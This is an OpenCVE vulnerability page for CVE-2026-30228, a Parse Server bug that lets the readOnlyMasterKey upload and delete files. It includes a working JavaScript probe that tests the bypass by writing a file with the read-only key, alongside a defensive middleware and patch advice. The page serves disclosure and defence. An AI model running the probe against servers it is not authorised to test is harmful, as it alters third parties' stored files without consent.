Description
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.5 and 9.5.0-alpha.3, the readOnlyMasterKey can be used to create and delete files via the Files API (POST /files/:filename, DELETE /files/:filename). This bypasses the read-only restriction which violates the access scope of the readOnlyMasterKey. Any Parse Server deployment that uses readOnlyMasterKey and exposes the Files API is affected. An attacker with access to the readOnlyMasterKey can upload arbitrary files or delete existing files. This issue has been patched in versions 8.6.5 and 9.5.0-alpha.3.
Published: 2026-03-06
Score: 6.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Unauthorized file upload and deletion via readOnlyMasterKey bypass
Action: Immediate Patch
AI Analysis

Impact

Parse Server lets an attacker who holds the readOnlyMasterKey create or delete files through the Files API, violating the key's intended read-only scope. The attacker can upload arbitrary files or erase existing ones, compromising the integrity of stored files; the CVSS vector rates this as a high integrity impact with no confidentiality or availability impact.

Affected Systems

Parse Server from parse-community is impacted: every release before 8.6.5, and the 9.5.0 pre-releases alpha.1 and alpha.2 (see the CPEs in the history below), is vulnerable when the deployment configures a readOnlyMasterKey and exposes the Files API.

Risk and Exploitability

The CVSS v4.0 base score is 6.9 (Medium; NVD's CVSS v3.1 score is 4.9), but the EPSS score is below 1% and the issue is not listed in KEV, so exploitation in the wild is unlikely at present. The vulnerability is exploitable remotely by sending POST or DELETE requests to /files/:filename with the readOnlyMasterKey in place of the master key, provided the Files API is reachable. The attacker must already hold the key (PR:H in the vector), so compromise or insufficient secrecy of the readOnlyMasterKey is a prerequisite. The practical exposure comes from the key's purpose: it is handed to parties that should only read data, so any such party, or anyone who obtains a copy of their key, gains the ability to write and delete files.
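An added check for the exploitation path described above (example code, not from Parse Server or the advisory): it uploads a small file through POST /files/:filename with the readOnlyMasterKey and reports whether the server stored it, then removes an accepted probe file with the full master key. The server URL, application ID, header names (the standard Parse REST headers X-Parse-Application-Id and X-Parse-Master-Key), the probe file name and the assumption that a 201 response carrying {url, name} means the file was stored are this example's own, not stated on the page.

```javascript
// Added example, not code from Parse Server or the advisory: a non-destructive
// probe for the CVE-2026-30228 bypass. It uploads a tiny file through
// POST /files/:filename using the readOnlyMasterKey and reports whether the
// server accepted it; an accepted upload is then removed with the full
// masterKey. Assumed (not stated on the page): the server is reachable at
// serverUrl (e.g. https://host/parse), keys travel in the standard Parse REST
// headers, and a 201 response carrying {url, name} means the file was stored.
// Requires Node 18+ for the global fetch().

const PROBE_FILENAME = 'cve-2026-30228-probe.txt'; // hypothetical name; any name works

// Build the upload request a Parse REST client would send, authenticated with
// the read-only master key instead of the master key.
function buildUploadProbe(serverUrl, appId, readOnlyMasterKey, filename = PROBE_FILENAME) {
  const base = serverUrl.replace(/\/+$/, '');
  return {
    url: `${base}/files/${encodeURIComponent(filename)}`,
    options: {
      method: 'POST',
      headers: {
        'X-Parse-Application-Id': appId,
        'X-Parse-Master-Key': readOnlyMasterKey,
        'Content-Type': 'text/plain',
      },
      body: 'CVE-2026-30228 probe; safe to delete',
    },
  };
}

// Parse Server prefixes stored files with a random token, so the name it
// returns, not the name we sent, is what a later DELETE must reference.
function buildDeleteRequest(serverUrl, appId, masterKey, storedName) {
  const base = serverUrl.replace(/\/+$/, '');
  return {
    url: `${base}/files/${encodeURIComponent(storedName)}`,
    options: {
      method: 'DELETE',
      headers: {
        'X-Parse-Application-Id': appId,
        'X-Parse-Master-Key': masterKey,
      },
    },
  };
}

// Classify the upload response. Only a stored file proves the bypass; any
// rejection (whatever the status or error code) means the write was refused.
function interpretUploadProbe(status, body) {
  if (status === 201 && body && typeof body.name === 'string') {
    return { vulnerable: true, storedName: body.name, reason: 'upload with readOnlyMasterKey was accepted' };
  }
  const detail = body && body.error ? `: ${body.error}` : '';
  return { vulnerable: false, storedName: null, reason: `upload rejected with HTTP ${status}${detail}` };
}

// Run the probe and clean up. masterKey is optional; without it an accepted
// probe file is left in place and its stored name is reported for manual removal.
async function probeReadOnlyFileWrite({ serverUrl, appId, readOnlyMasterKey, masterKey }) {
  const upload = buildUploadProbe(serverUrl, appId, readOnlyMasterKey);
  const res = await fetch(upload.url, upload.options);
  let body = null;
  try { body = await res.json(); } catch { /* non-JSON error page */ }
  const verdict = interpretUploadProbe(res.status, body);
  if (verdict.vulnerable && masterKey) {
    const del = buildDeleteRequest(serverUrl, appId, masterKey, verdict.storedName);
    const delRes = await fetch(del.url, del.options);
    verdict.cleanedUp = delRes.ok;
  }
  return verdict;
}

// Usage (fill in your own values):
// probeReadOnlyFileWrite({ serverUrl: 'https://host/parse', appId: 'APP_ID',
//   readOnlyMasterKey: 'RO_KEY', masterKey: 'MASTER_KEY' }).then(console.log);
```

Run it only against a deployment you are authorised to test; a vulnerable server will store the probe file, which is why the clean-up path needs the full master key.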

Generated by OpenCVE AI on April 16, 2026 at 11:14 UTC.

Remediation

The vendor fix is the upgrade to Parse Server 8.6.5 or 9.5.0-alpha.3 (GHSA-xfh7-phr7-gr2x); the advisory text gives no workaround for deployments that cannot upgrade.

OpenCVE Recommended Actions

  • Upgrade Parse Server to version 8.6.5 or later; if using a 9.5.0‑alpha release, upgrade to 9.5.0‑alpha.3.
  • As a temporary control until the upgrade, block POST and DELETE requests to /files/:filename that present the readOnlyMasterKey (for example at a reverse proxy or in middleware in front of Parse Server), so the key cannot be used for file manipulation while read access continues to work.
  • If the readOnlyMasterKey is not needed, remove it from the server configuration; if it is needed and may have been shared more widely than intended, rotate it.
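One way to implement the temporary control above, as an added example that is not Parse Server project code: an Express-style middleware mounted in front of Parse Server that refuses Files API writes authenticated with the readOnlyMasterKey. The mount path (/parse), the header name X-Parse-Master-Key, the 403 status and the function names are this example's assumptions; the error code 119 is Parse's OPERATION_FORBIDDEN, which Parse Server uses for its other read-only master key write refusals.

```javascript
// Added example, not Parse Server project code: an Express-style middleware
// that refuses file writes authenticated with the readOnlyMasterKey until the
// server is upgraded. Assumed (not on the page): Parse Server is mounted under
// mountPath (default /parse) and the REST API carries the key in the
// X-Parse-Master-Key header. Install it before the Parse Server handler, e.g.
//   app.use(readOnlyFileWriteGuard({ masterKey, readOnlyMasterKey }));
//   app.use('/parse', parseServer.app);

function readOnlyFileWriteGuard({ masterKey, readOnlyMasterKey, mountPath = '/parse' }) {
  if (!masterKey || !readOnlyMasterKey) {
    throw new Error('masterKey and readOnlyMasterKey are both required');
  }
  if (masterKey === readOnlyMasterKey) {
    throw new Error('readOnlyMasterKey must differ from masterKey');
  }
  const filesPrefix = `${mountPath.replace(/\/+$/, '')}/files/`;
  const writeMethods = new Set(['POST', 'DELETE']);

  // True when the request is a Files API write presenting the read-only key.
  // The full master key keeps its write rights; requests with no master key at
  // all are left to Parse Server's normal file-upload permission checks.
  function isBlocked(method, path, presentedKey) {
    if (!writeMethods.has(String(method).toUpperCase())) return false;
    if (!path.startsWith(filesPrefix)) return false;
    if (presentedKey === undefined || presentedKey === null) return false;
    if (presentedKey === masterKey) return false;
    return presentedKey === readOnlyMasterKey;
  }

  function middleware(req, res, next) {
    // req.baseUrl + req.path gives the full path whether or not Express mounted
    // this middleware under a prefix; fall back to req.url for plain objects.
    const path = (req.baseUrl || '') + (req.path || String(req.url || '').split('?')[0]);
    const key = typeof req.get === 'function'
      ? req.get('X-Parse-Master-Key')
      : (req.headers || {})['x-parse-master-key'];
    if (isBlocked(req.method, path, key)) {
      // 119 is Parse's OPERATION_FORBIDDEN code, the one Parse Server raises
      // for other read-only master key write attempts; 403 is this guard's choice.
      return res.status(403).json({
        code: 119,
        error: "read-only masterKey isn't allowed to create or delete files.",
      });
    }
    return next();
  }

  middleware.isBlocked = isBlocked; // exposed so the decision logic can be tested
  return middleware;
}
```

The guard compares the presented key against both configured keys rather than only against readOnlyMasterKey, so a request carrying the full master key is never blocked and a deployment that accidentally set both keys to the same value fails at startup instead of silently locking the master key out of the Files API.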

Advisories
Source: GitHub GHSA
ID: GHSA-xfh7-phr7-gr2x
Title: parse-server's file creation and deletion bypasses `readOnlyMasterKey` write restriction
History

Wed, 11 Mar 2026 12:45:00 +0000

Type | Values Removed | Values Added
First Time appeared | | Parseplatform
 | | Parseplatform parse-server
CPEs | | cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*
 | | cpe:2.3:a:parseplatform:parse-server:9.5.0:alpha1:*:*:*:node.js:*:*
 | | cpe:2.3:a:parseplatform:parse-server:9.5.0:alpha2:*:*:*:node.js:*:*
Vendors & Products | | Parseplatform
 | | Parseplatform parse-server
Metrics | | cvssV3_1 {'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N'}


Mon, 09 Mar 2026 21:15:00 +0000

Type | Values Removed | Values Added
Metrics | | ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Mon, 09 Mar 2026 10:15:00 +0000

Type | Values Removed | Values Added
First Time appeared | | Parse Community
 | | Parse Community parse Server
Vendors & Products | | Parse Community
 | | Parse Community parse Server

Fri, 06 Mar 2026 20:45:00 +0000

Type | Values Removed | Values Added
Description | | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.5 and 9.5.0-alpha.3, the readOnlyMasterKey can be used to create and delete files via the Files API (POST /files/:filename, DELETE /files/:filename). This bypasses the read-only restriction which violates the access scope of the readOnlyMasterKey. Any Parse Server deployment that uses readOnlyMasterKey and exposes the Files API is affected. An attacker with access to the readOnlyMasterKey can upload arbitrary files or delete existing files. This issue has been patched in versions 8.6.5 and 9.5.0-alpha.3.
Title | | Parse Server: File creation and deletion bypasses `readOnlyMasterKey` write restriction
Weaknesses | | CWE-863
References | | 
Metrics | | cvssV4_0 {'score': 6.9, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-09T20:34:21.036Z

Reserved: 2026-03-04T17:23:59.797Z

Link: CVE-2026-30228

Vulnrichment

Updated: 2026-03-09T20:29:50.333Z

NVD

Status : Analyzed

Published: 2026-03-06T21:16:16.767

Modified: 2026-03-11T12:33:58.587

Link: CVE-2026-30228

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T11:15:27Z

Weaknesses